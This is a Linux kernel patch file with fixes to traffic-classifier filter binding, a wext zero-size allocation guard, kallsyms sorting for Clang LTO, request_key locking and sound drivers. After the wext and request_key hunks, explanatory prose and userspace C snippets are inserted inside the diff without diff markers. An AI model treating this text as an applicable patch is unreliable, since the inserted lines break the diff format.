++		gen_flags = nla_get_u32(tb[TCA_BPF_FLAGS_GEN]);
++		if (gen_flags & ~CLS_BPF_SUPPORTED_GEN_FLAGS ||
++		    !tc_flags_valid(gen_flags)) {
++			ret = -EINVAL;
++			goto errout_idr;
++		}
++	}
++
++	prog->exts_integrated = have_exts;
++	prog->gen_flags = gen_flags;
++
++	ret = is_bpf ? cls_bpf_prog_from_ops(tb, prog) :
++		cls_bpf_prog_from_efd(tb, prog, gen_flags, tp);
+ 	if (ret < 0)
+ 		goto errout_idr;
+ 
++	if (tb[TCA_BPF_CLASSID]) {
++		prog->res.classid = nla_get_u32(tb[TCA_BPF_CLASSID]);
++		tcf_bind_filter(tp, &prog->res, base);
++		bound_to_filter = true;
++	}
++
+ 	ret = cls_bpf_offload(tp, prog, oldprog, extack);
+ 	if (ret)
+ 		goto errout_parms;
+@@ -528,6 +521,8 @@ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
+ 	return 0;
+ 
+ errout_parms:
++	if (bound_to_filter)
++		tcf_unbind_filter(tp, &prog->res);
+ 	cls_bpf_free_parms(prog);
+ errout_idr:
+ 	if (!oldprog)
+diff --git a/net/sched/cls_matchall.c b/net/sched/cls_matchall.c
+index 39a5d9c170def..43f8df5847414 100644
+--- a/net/sched/cls_matchall.c
++++ b/net/sched/cls_matchall.c
+@@ -157,26 +157,6 @@ static const struct nla_policy mall_policy[TCA_MATCHALL_MAX + 1] = {
+ 	[TCA_MATCHALL_FLAGS]		= { .type = NLA_U32 },
+ };
+ 
+-static int mall_set_parms(struct net *net, struct tcf_proto *tp,
+-			  struct cls_mall_head *head,
+-			  unsigned long base, struct nlattr **tb,
+-			  struct nlattr *est, u32 flags, u32 fl_flags,
+-			  struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	err = tcf_exts_validate_ex(net, tp, tb, est, &head->exts, flags,
+-				   fl_flags, extack);
+-	if (err < 0)
+-		return err;
+-
+-	if (tb[TCA_MATCHALL_CLASSID]) {
+-		head->res.classid = nla_get_u32(tb[TCA_MATCHALL_CLASSID]);
+-		tcf_bind_filter(tp, &head->res, base);
+-	}
+-	return 0;
+-}
+-
+ static int mall_change(struct net *net, struct sk_buff *in_skb,
+ 		       struct tcf_proto *tp, unsigned long base,
+ 		       u32 handle, struct nlattr **tca,
+@@ -185,6 +165,7 @@ static int mall_change(struct net *net, struct sk_buff *in_skb,
+ {
+ 	struct cls_mall_head *head = rtnl_dereference(tp->root);
+ 	struct nlattr *tb[TCA_MATCHALL_MAX + 1];
++	bool bound_to_filter = false;
+ 	struct cls_mall_head *new;
+ 	u32 userflags = 0;
+ 	int err;
+@@ -224,11 +205,17 @@ static int mall_change(struct net *net, struct sk_buff *in_skb,
+ 		goto err_alloc_percpu;
+ 	}
+ 
+-	err = mall_set_parms(net, tp, new, base, tb, tca[TCA_RATE],
+-			     flags, new->flags, extack);
+-	if (err)
++	err = tcf_exts_validate_ex(net, tp, tb, tca[TCA_RATE],
++				   &new->exts, flags, new->flags, extack);
++	if (err < 0)
+ 		goto err_set_parms;
+ 
++	if (tb[TCA_MATCHALL_CLASSID]) {
++		new->res.classid = nla_get_u32(tb[TCA_MATCHALL_CLASSID]);
++		tcf_bind_filter(tp, &new->res, base);
++		bound_to_filter = true;
++	}
++
+ 	if (!tc_skip_hw(new->flags)) {
+ 		err = mall_replace_hw_filter(tp, new, (unsigned long)new,
+ 					     extack);
+@@ -244,6 +231,8 @@ static int mall_change(struct net *net, struct sk_buff *in_skb,
+ 	return 0;
+ 
+ err_replace_hw_filter:
++	if (bound_to_filter)
++		tcf_unbind_filter(tp, &new->res);
+ err_set_parms:
+ 	free_percpu(new->pf);
+ err_alloc_percpu:
+diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
+index a3477537c102b..1280736a7b92e 100644
+--- a/net/sched/cls_u32.c
++++ b/net/sched/cls_u32.c
+@@ -710,8 +710,23 @@ static const struct nla_policy u32_policy[TCA_U32_MAX + 1] = {
+ 	[TCA_U32_FLAGS]		= { .type = NLA_U32 },
+ };
+ 
++static void u32_unbind_filter(struct tcf_proto *tp, struct tc_u_knode *n,
++			      struct nlattr **tb)
++{
++	if (tb[TCA_U32_CLASSID])
++		tcf_unbind_filter(tp, &n->res);
++}
++
++static void u32_bind_filter(struct tcf_proto *tp, struct tc_u_knode *n,
++			    unsigned long base, struct nlattr **tb)
++{
++	if (tb[TCA_U32_CLASSID]) {
++		n->res.classid = nla_get_u32(tb[TCA_U32_CLASSID]);
++		tcf_bind_filter(tp, &n->res, base);
++	}
++}
++
+ static int u32_set_parms(struct net *net, struct tcf_proto *tp,
+-			 unsigned long base,
+ 			 struct tc_u_knode *n, struct nlattr **tb,
+ 			 struct nlattr *est, u32 flags, u32 fl_flags,
+ 			 struct netlink_ext_ack *extack)
+@@ -758,10 +773,6 @@ static int u32_set_parms(struct net *net, struct tcf_proto *tp,
+ 		if (ht_old)
+ 			ht_old->refcnt--;
+ 	}
+-	if (tb[TCA_U32_CLASSID]) {
+-		n->res.classid = nla_get_u32(tb[TCA_U32_CLASSID]);
+-		tcf_bind_filter(tp, &n->res, base);
+-	}
+ 
+ 	if (ifindex >= 0)
+ 		n->ifindex = ifindex;
+@@ -901,17 +912,27 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
+ 		if (!new)
+ 			return -ENOMEM;
+ 
+-		err = u32_set_parms(net, tp, base, new, tb,
+-				    tca[TCA_RATE], flags, new->flags,
+-				    extack);
++		err = u32_set_parms(net, tp, new, tb, tca[TCA_RATE],
++				    flags, new->flags, extack);
+ 
+ 		if (err) {
+ 			__u32_destroy_key(new);
+ 			return err;
+ 		}
+ 
++		u32_bind_filter(tp, new, base, tb);
++
+ 		err = u32_replace_hw_knode(tp, new, flags, extack);
+ 		if (err) {
++			u32_unbind_filter(tp, new, tb);
++
++			if (tb[TCA_U32_LINK]) {
++				struct tc_u_hnode *ht_old;
++
++				ht_old = rtnl_dereference(n->ht_down);
++				if (ht_old)
++					ht_old->refcnt++;
++			}
+ 			__u32_destroy_key(new);
+ 			return err;
+ 		}
+@@ -1072,15 +1093,18 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
+ 	}
+ #endif
+ 
+-	err = u32_set_parms(net, tp, base, n, tb, tca[TCA_RATE],
++	err = u32_set_parms(net, tp, n, tb, tca[TCA_RATE],
+ 			    flags, n->flags, extack);
++
++	u32_bind_filter(tp, n, base, tb);
++
+ 	if (err == 0) {
+ 		struct tc_u_knode __rcu **ins;
+ 		struct tc_u_knode *pins;
+ 
+ 		err = u32_replace_hw_knode(tp, n, flags, extack);
+ 		if (err)
+-			goto errhw;
++			goto errunbind;
+ 
+ 		if (!tc_in_hw(n->flags))
+ 			n->flags |= TCA_CLS_FLAGS_NOT_IN_HW;
+@@ -1098,7 +1122,9 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
+ 		return 0;
+ 	}
+ 
+-errhw:
++errunbind:
++	u32_unbind_filter(tp, n, tb);
++
+ #ifdef CONFIG_CLS_U32_MARK
+ 	free_percpu(n->pcpu_success);
+ #endif
+diff --git a/net/wireless/wext-core.c b/net/wireless/wext-core.c
+index fe8765c4075d3..8a4b85f96a13a 100644
+--- a/net/wireless/wext-core.c
++++ b/net/wireless/wext-core.c
+@@ -799,6 +799,12 @@ static int ioctl_standard_iw_point(struct iw_point *iwp, unsigned int cmd,
+ 		}
+ 	}
+ 
++	/* Sanity-check to ensure we never end up _allocating_ zero
++	 * bytes of data for extra.
++	 */
++	if (extra_size <= 0)
++		return -EFAULT;
++
+ 	/* kzalloc() ensures NULL-termination for essid_compat. */
+ 	extra = kzalloc(extra_size, GFP_KERNEL);
+ 	if (!extra)
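
The wext guard above matters because in the kernel a zero-byte kzalloc() succeeds (it returns the non-NULL ZERO_SIZE_PTR), so a non-positive extra_size would sail past the NULL check and corrupt memory later. A hedged userspace analogue, with calloc() standing in for kzalloc():

/* Fail early on a non-positive size instead of letting a 0-byte
 * allocation "succeed"; malloc(0)/calloc(0) behaviour is
 * implementation-defined, the userspace cousin of ZERO_SIZE_PTR. */
#include <stdio.h>
#include <stdlib.h>

static int handle(int extra_size)
{
	char *extra;

	if (extra_size <= 0)		/* fail early, as the patch does */
		return -14;		/* -EFAULT */

	extra = calloc(1, extra_size);	/* kzalloc() analogue */
	if (!extra)
		return -12;		/* -ENOMEM */
	free(extra);
	return 0;
}

int main(void)
{
	printf("%d %d\n", handle(0), handle(32));
	return 0;
}
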
+diff --git a/scripts/kallsyms.c b/scripts/kallsyms.c
+index 03fa07ad45d95..80aab2aa72246 100644
+--- a/scripts/kallsyms.c
++++ b/scripts/kallsyms.c
+@@ -5,7 +5,8 @@
+  * This software may be used and distributed according to the terms
+  * of the GNU General Public License, incorporated herein by reference.
+  *
+- * Usage: nm -n vmlinux | scripts/kallsyms [--all-symbols] > symbols.S
++ * Usage: kallsyms [--all-symbols] [--absolute-percpu]
++ *                         [--base-relative] [--lto-clang] in.map > out.S
+  *
+  *      Table compression uses all the unused char codes on the symbols and
+  *  maps these to the most used substrings (tokens). For instance, it might
+@@ -49,6 +50,7 @@ _Static_assert(
+ struct sym_entry {
+ 	unsigned long long addr;
+ 	unsigned int len;
++	unsigned int seq;
+ 	unsigned int start_pos;
+ 	unsigned int percpu_absolute;
+ 	unsigned char sym[];
+@@ -77,6 +79,7 @@ static unsigned int table_size, table_cnt;
+ static int all_symbols;
+ static int absolute_percpu;
+ static int base_relative;
++static int lto_clang;
+ 
+ static int token_profit[0x10000];
+ 
+@@ -88,7 +91,7 @@ static unsigned char best_table_len[256];
+ static void usage(void)
+ {
+ 	fprintf(stderr, "Usage: kallsyms [--all-symbols] [--absolute-percpu] "
+-			"[--base-relative] in.map > out.S\n");
++			"[--base-relative] [--lto-clang] in.map > out.S\n");
+ 	exit(1);
+ }
+ 
+@@ -116,6 +119,7 @@ static bool is_ignored_symbol(const char *name, char type)
+ 		"kallsyms_markers",
+ 		"kallsyms_token_table",
+ 		"kallsyms_token_index",
++		"kallsyms_seqs_of_names",
+ 		/* Exclude linker generated symbols which vary between passes */
+ 		"_SDA_BASE_",		/* ppc */
+ 		"_SDA2_BASE_",		/* ppc */
+@@ -410,6 +414,65 @@ static int symbol_absolute(const struct sym_entry *s)
+ 	return s->percpu_absolute;
+ }
+ 
++static char * s_name(char *buf)
++{
++	/* Skip the symbol type */
++	return buf + 1;
++}
++
++static void cleanup_symbol_name(char *s)
++{
++	char *p;
++
++	if (!lto_clang)
++		return;
++
++	/*
++	 * ASCII[.]   = 2e
++	 * ASCII[0-9] = 30,39
++	 * ASCII[A-Z] = 41,5a
++	 * ASCII[_]   = 5f
++	 * ASCII[a-z] = 61,7a
++	 *
++	 * As above, replacing the first '.' in ".llvm." with '\0' does not
++	 * affect the main sorting, but it helps us with subsorting.
++	 */
++	p = strstr(s, ".llvm.");
++	if (p)
++		*p = '\0';
++}
++
++static int compare_names(const void *a, const void *b)
++{
++	int ret;
++	char sa_namebuf[KSYM_NAME_LEN];
++	char sb_namebuf[KSYM_NAME_LEN];
++	const struct sym_entry *sa = *(const struct sym_entry **)a;
++	const struct sym_entry *sb = *(const struct sym_entry **)b;
++
++	expand_symbol(sa->sym, sa->len, sa_namebuf);
++	expand_symbol(sb->sym, sb->len, sb_namebuf);
++	cleanup_symbol_name(s_name(sa_namebuf));
++	cleanup_symbol_name(s_name(sb_namebuf));
++	ret = strcmp(s_name(sa_namebuf), s_name(sb_namebuf));
++	if (!ret) {
++		if (sa->addr > sb->addr)
++			return 1;
++		else if (sa->addr < sb->addr)
++			return -1;
++
++		/* keep old order */
++		return (int)(sa->seq - sb->seq);
++	}
++
++	return ret;
++}
++
++static void sort_symbols_by_name(void)
++{
++	qsort(table, table_cnt, sizeof(table[0]), compare_names);
++}
++
+ static void write_src(void)
+ {
+ 	unsigned int i, k, off;
+@@ -495,6 +558,7 @@ static void write_src(void)
+ 	for (i = 0; i < table_cnt; i++) {
+ 		if ((i & 0xFF) == 0)
+ 			markers[i >> 8] = off;
++		table[i]->seq = i;
+ 
+ 		/* There cannot be any symbol of length zero. */
+ 		if (table[i]->len == 0) {
+@@ -535,6 +599,12 @@ static void write_src(void)
+ 
+ 	free(markers);
+ 
++	sort_symbols_by_name();
++	output_label("kallsyms_seqs_of_names");
++	for (i = 0; i < table_cnt; i++)
++		printf("\t.long\t%u\n", table[i]->seq);
++	printf("\n");
++
+ 	output_label("kallsyms_token_table");
+ 	off = 0;
+ 	for (i = 0; i < 256; i++) {
+@@ -818,6 +888,7 @@ int main(int argc, char **argv)
+ 			{"all-symbols",     no_argument, &all_symbols,     1},
+ 			{"absolute-percpu", no_argument, &absolute_percpu, 1},
+ 			{"base-relative",   no_argument, &base_relative,   1},
++			{"lto-clang",       no_argument, &lto_clang,       1},
+ 			{},
+ 		};
+ 
+diff --git a/scripts/link-vmlinux.sh b/scripts/link-vmlinux.sh
+index 918470d768e9c..32e573943cf03 100755
+--- a/scripts/link-vmlinux.sh
++++ b/scripts/link-vmlinux.sh
+@@ -156,6 +156,10 @@ kallsyms()
+ 		kallsymopt="${kallsymopt} --base-relative"
+ 	fi
+ 
++	if is_enabled CONFIG_LTO_CLANG; then
++		kallsymopt="${kallsymopt} --lto-clang"
++	fi
++
+ 	info KSYMS ${2}
+ 	scripts/kallsyms ${kallsymopt} ${1} > ${2}
+ }
+diff --git a/security/keys/request_key.c b/security/keys/request_key.c
+index 07a0ef2baacd8..a7673ad86d18d 100644
+--- a/security/keys/request_key.c
++++ b/security/keys/request_key.c
+@@ -401,17 +401,21 @@ static int construct_alloc_key(struct keyring_search_context *ctx,
+ 	set_bit(KEY_FLAG_USER_CONSTRUCT, &key->flags);
+ 
+ 	if (dest_keyring) {
+-		ret = __key_link_lock(dest_keyring, &ctx->index_key);
++		ret = __key_link_lock(dest_keyring, &key->index_key);
+ 		if (ret < 0)
+ 			goto link_lock_failed;
+-		ret = __key_link_begin(dest_keyring, &ctx->index_key, &edit);
+-		if (ret < 0)
+-			goto link_prealloc_failed;
+ 	}
+ 
+-	/* attach the key to the destination keyring under lock, but we do need
++	/*
++	 * Attach the key to the destination keyring under lock, but we do need
+ 	 * to do another check just in case someone beat us to it whilst we
+-	 * waited for locks */
++	 * waited for locks.
++	 *
++	 * The caller might specify a comparison function which looks for keys
++	 * that do not exactly match but are still equivalent from the caller's
++	 * perspective. The __key_link_begin() operation must be done only after
++	 * an actual key is determined.
++	 */
+ 	mutex_lock(&key_construction_mutex);
+ 
+ 	rcu_read_lock();
+@@ -420,12 +424,16 @@ static int construct_alloc_key(struct keyring_search_context *ctx,
+ 	if (!IS_ERR(key_ref))
+ 		goto key_already_present;
+ 
+-	if (dest_keyring)
++	if (dest_keyring) {
++		ret = __key_link_begin(dest_keyring, &key->index_key, &edit);
++		if (ret < 0)
++			goto link_alloc_failed;
+ 		__key_link(dest_keyring, key, &edit);
++	}
+ 
+ 	mutex_unlock(&key_construction_mutex);
+ 	if (dest_keyring)
+-		__key_link_end(dest_keyring, &ctx->index_key, edit);
++		__key_link_end(dest_keyring, &key->index_key, edit);
+ 	mutex_unlock(&user->cons_lock);
+ 	*_key = key;
+ 	kleave(" = 0 [%d]", key_serial(key));
+@@ -438,10 +446,13 @@ key_already_present:
+ 	mutex_unlock(&key_construction_mutex);
+ 	key = key_ref_to_ptr(key_ref);
+ 	if (dest_keyring) {
++		ret = __key_link_begin(dest_keyring, &key->index_key, &edit);
++		if (ret < 0)
++			goto link_alloc_failed_unlocked;
+ 		ret = __key_link_check_live_key(dest_keyring, key);
+ 		if (ret == 0)
+ 			__key_link(dest_keyring, key, &edit);
+-		__key_link_end(dest_keyring, &ctx->index_key, edit);
++		__key_link_end(dest_keyring, &key->index_key, edit);
+ 		if (ret < 0)
+ 			goto link_check_failed;
+ 	}
+@@ -456,8 +467,10 @@ link_check_failed:
+ 	kleave(" = %d [linkcheck]", ret);
+ 	return ret;
+ 
+-link_prealloc_failed:
+-	__key_link_end(dest_keyring, &ctx->index_key, edit);
++link_alloc_failed:
++	mutex_unlock(&key_construction_mutex);
++link_alloc_failed_unlocked:
++	__key_link_end(dest_keyring, &key->index_key, edit);
+ link_lock_failed:
+ 	mutex_unlock(&user->cons_lock);
+ 	key_put(key);
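
The request_key reordering defers __key_link_begin() until after the under-lock re-search, because that search may return an equivalent key chosen by the caller's comparison function rather than the key just allocated; preparing the keyring link for the wrong object would be wasted (or worse, mismatched) work. A toy illustration of preparing the link only once the real target is known; every name in it is invented for the sketch:

/* Prepare the link against the key actually found, not the one we
 * allocated. Locking is implied by the surrounding comments. */
#include <stdio.h>

struct key { int serial; };

static struct key pool[2] = { { 1 }, { 2 } };

static struct key *search_equivalent(struct key *candidate)
{
	(void)candidate;
	return &pool[0];	/* pretend key #1 was instantiated first */
}

static void link_begin(struct key *k)  { printf("prep link for key %d\n", k->serial); }
static void link_commit(struct key *k) { printf("link key %d\n", k->serial); }

int main(void)
{
	struct key *ours = &pool[1];
	struct key *found;

	/* construction mutex would be held here */
	found = search_equivalent(ours);
	link_begin(found);	/* only now do we know the real target */
	link_commit(found);
	return 0;
}
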
+diff --git a/security/keys/trusted-keys/trusted_tpm2.c b/security/keys/trusted-keys/trusted_tpm2.c
+index 2b2c8eb258d5b..bc700f85f80be 100644
+--- a/security/keys/trusted-keys/trusted_tpm2.c
++++ b/security/keys/trusted-keys/trusted_tpm2.c
+@@ -186,7 +186,7 @@ int tpm2_key_priv(void *context, size_t hdrlen,
+ }
+ 
+ /**
+- * tpm_buf_append_auth() - append TPMS_AUTH_COMMAND to the buffer.
++ * tpm2_buf_append_auth() - append TPMS_AUTH_COMMAND to the buffer.
+  *
+  * @buf: an allocated tpm_buf instance
+  * @session_handle: session handle
+diff --git a/sound/pci/emu10k1/emufx.c b/sound/pci/emu10k1/emufx.c
+index 6cf7c8b1de47d..4ca65f425f39c 100644
+--- a/sound/pci/emu10k1/emufx.c
++++ b/sound/pci/emu10k1/emufx.c
+@@ -1563,14 +1563,8 @@ A_OP(icode, &ptr, iMAC0, A_GPR(var), A_GPR(var), A_GPR(vol), A_EXTIN(input))
+ 	gpr += 2;
+ 
+ 	/* Master volume (will be renamed later) */
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+0+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+0+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+1+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+1+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+2+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+2+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+3+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+3+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+4+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+4+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+5+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+5+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+6+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+6+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+7+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+7+SND_EMU10K1_PLAYBACK_CHANNELS));
++	for (z = 0; z < 8; z++)
++		A_OP(icode, &ptr, iMAC0, A_GPR(playback+z+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+z+SND_EMU10K1_PLAYBACK_CHANNELS));
+ 	snd_emu10k1_init_mono_control(&controls[nctl++], "Wave Master Playback Volume", gpr, 0);
+ 	gpr += 2;
+ 
+@@ -1654,102 +1648,14 @@ A_OP(icode, &ptr, iMAC0, A_GPR(var), A_GPR(var), A_GPR(vol), A_EXTIN(input))
+ 			dev_dbg(emu->card->dev, "emufx.c: gpr=0x%x, tmp=0x%x\n",
+ 			       gpr, tmp);
+ 			*/
+-			/* For the EMU1010: How to get 32bit values from the DSP. High 16bits into L, low 16bits into R. */
+-			/* A_P16VIN(0) is delayed by one sample,
+-			 * so all other A_P16VIN channels will need to also be delayed
+-			 */
+-			/* Left ADC in. 1 of 2 */
+ 			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_P16VIN(0x0), A_FXBUS2(0) );
+-			/* Right ADC in 1 of 2 */
+-			gpr_map[gpr++] = 0x00000000;
+-			/* Delaying by one sample: instead of copying the input
+-			 * value A_P16VIN to output A_FXBUS2 as in the first channel,
+-			 * we use an auxiliary register, delaying the value by one
+-			 * sample
+-			 */
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(2) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x1), A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(4) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x2), A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(6) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x3), A_C_00000000, A_C_00000000);
+-			/* For 96kHz mode */
+-			/* Left ADC in. 2 of 2 */
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(0x8) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x4), A_C_00000000, A_C_00000000);
+-			/* Right ADC in 2 of 2 */
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(0xa) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x5), A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(0xc) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x6), A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(0xe) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x7), A_C_00000000, A_C_00000000);
+-			/* Pavel Hofman - we still have voices, A_FXBUS2s, and
+-			 * A_P16VINs available -
+-			 * let's add 8 more capture channels - total of 16
+-			 */
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x10));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x8),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x12));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x9),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x14));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xa),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x16));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xb),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x18));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xc),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x1a));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xd),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x1c));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xe),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x1e));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xf),
+-			     A_C_00000000, A_C_00000000);
++			/* A_P16VIN(0) is delayed by one sample, so all other A_P16VIN channels
++			 * will need to also be delayed; we use an auxiliary register for that. */
++			for (z = 1; z < 0x10; z++) {
++				snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr), A_FXBUS2(z * 2) );
++				A_OP(icode, &ptr, iACC3, A_GPR(gpr), A_P16VIN(z), A_C_00000000, A_C_00000000);
++				gpr_map[gpr++] = 0x00000000;
++			}
+ 		}
+ 
+ #if 0
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 72fa1509cc4ba..cb34a62075b13 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -122,6 +122,7 @@ struct alc_spec {
+ 	unsigned int ultra_low_power:1;
+ 	unsigned int has_hs_key:1;
+ 	unsigned int no_internal_mic_pin:1;
++	unsigned int en_3kpull_low:1;
+ 
+ 	/* for PLL fix */
+ 	hda_nid_t pll_nid;
+@@ -3622,6 +3623,7 @@ static void alc256_shutup(struct hda_codec *codec)
+ 	if (!hp_pin)
+ 		hp_pin = 0x21;
+ 
++	alc_update_coefex_idx(codec, 0x57, 0x04, 0x0007, 0x1); /* Low power */
+ 	hp_pin_sense = snd_hda_jack_detect(codec, hp_pin);
+ 
+ 	if (hp_pin_sense)
+@@ -3638,8 +3640,7 @@ static void alc256_shutup(struct hda_codec *codec)
+ 	/* If disable 3k pulldown control for alc257, the Mic detection will not work correctly
+ 	 * when booting with headset plugged. So skip setting it for the codec alc257
+ 	 */
+-	if (codec->core.vendor_id != 0x10ec0236 &&
+-	    codec->core.vendor_id != 0x10ec0257)
++	if (spec->en_3kpull_low)
+ 		alc_update_coef_idx(codec, 0x46, 0, 3 << 12);
+ 
+ 	if (!spec->no_shutup_pins)
+@@ -4623,6 +4624,21 @@ static void alc236_fixup_hp_mute_led_coefbit(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc236_fixup_hp_mute_led_coefbit2(struct hda_codec *codec,
++					  const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++
++	if (action == HDA_FIXUP_ACT_PRE_PROBE) {
++		spec->mute_led_polarity = 0;
++		spec->mute_led_coef.idx = 0x07;
++		spec->mute_led_coef.mask = 1;
++		spec->mute_led_coef.on = 1;
++		spec->mute_led_coef.off = 0;
++		snd_hda_gen_add_mute_led_cdev(codec, coef_mute_led_set);
++	}
++}
++
+ /* turn on/off mic-mute LED per capture hook by coef bit */
+ static int coef_micmute_led_set(struct led_classdev *led_cdev,
+ 				enum led_brightness brightness)
+@@ -7133,6 +7149,7 @@ enum {
+ 	ALC285_FIXUP_HP_GPIO_LED,
+ 	ALC285_FIXUP_HP_MUTE_LED,
+ 	ALC285_FIXUP_HP_SPECTRE_X360_MUTE_LED,
++	ALC236_FIXUP_HP_MUTE_LED_COEFBIT2,
+ 	ALC236_FIXUP_HP_GPIO_LED,
